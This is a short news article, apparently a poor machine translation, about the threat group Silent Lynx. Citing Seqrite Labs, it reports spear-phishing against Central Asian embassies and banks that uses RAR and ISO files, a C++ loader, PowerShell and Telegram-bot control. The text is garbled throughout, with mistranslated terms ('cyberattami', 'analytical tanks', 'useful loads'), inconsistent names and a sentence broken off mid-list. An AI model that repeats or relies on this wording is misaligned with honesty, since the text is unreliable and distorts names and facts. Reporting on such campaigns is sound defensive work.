Previously, an unregistered actor of the threat, known as the silent trot, was associated with cyberattami aimed at various formations in Kyrgyzstan and Turkmenistan.
“This group of threats previously targeted by organizations in Eastern Europe and Central Asia involved in making economic decisions and the banking sector,” – Researcher Seqrite Labs Subhajeet Singhaa – Note In a technical report published at the end of last month.
The targets of the group attacks include embassies, lawyers, banks supported by government and analytical tanks. Activities were related to the actor of the threat of Kazakhstan-medication with the middle level of trust.
The infections begin with an e -mail spear that contains an attachment of the RAR archive, which eventually acts as a vehicle for harmful useful loads responsible for providing distant access to the impaired hosts.
The first of the two companies identified by the cybersecurity company on December 27, 2024, uses the RAR archive to launch the ISO file, which in turn includes a harmful C ++ and a PDF. The following file continues to launch the PowerShell scenario, which uses Telegram Bots (named “@South_korea145_bot” and “@south_afr_angl_bot”) to perform teams and exports.
Some of the Bots teams include Curl commands to download and save additional useful loads from the remote server (“PWEOBMXDLBOI (.) COM”) or Google Drive.
Another company, on the contrary, uses a malicious RAR archive containing two files: bait: 8082 “).
SEQRITE Labs said there is some level of tactical overlapping between the actor threats and Yorotrooper (AKA Sturgeonphisher), which was associated with attacks aimed at the Commonwealth countries (CIS) using PowerShell and Golang tools.
“Silent Lynx demonstrates a complex multi-stage attack strategy using ISO files, C ++ loaders, PowerShell scripts and hunting implants,” Siga said.
“Their dependence on Telegram Bots for Command and Control In conjunction with bait documents and regional targeting, which also emphasizes their emphasis on espionage in Central Asia and SPAC.”
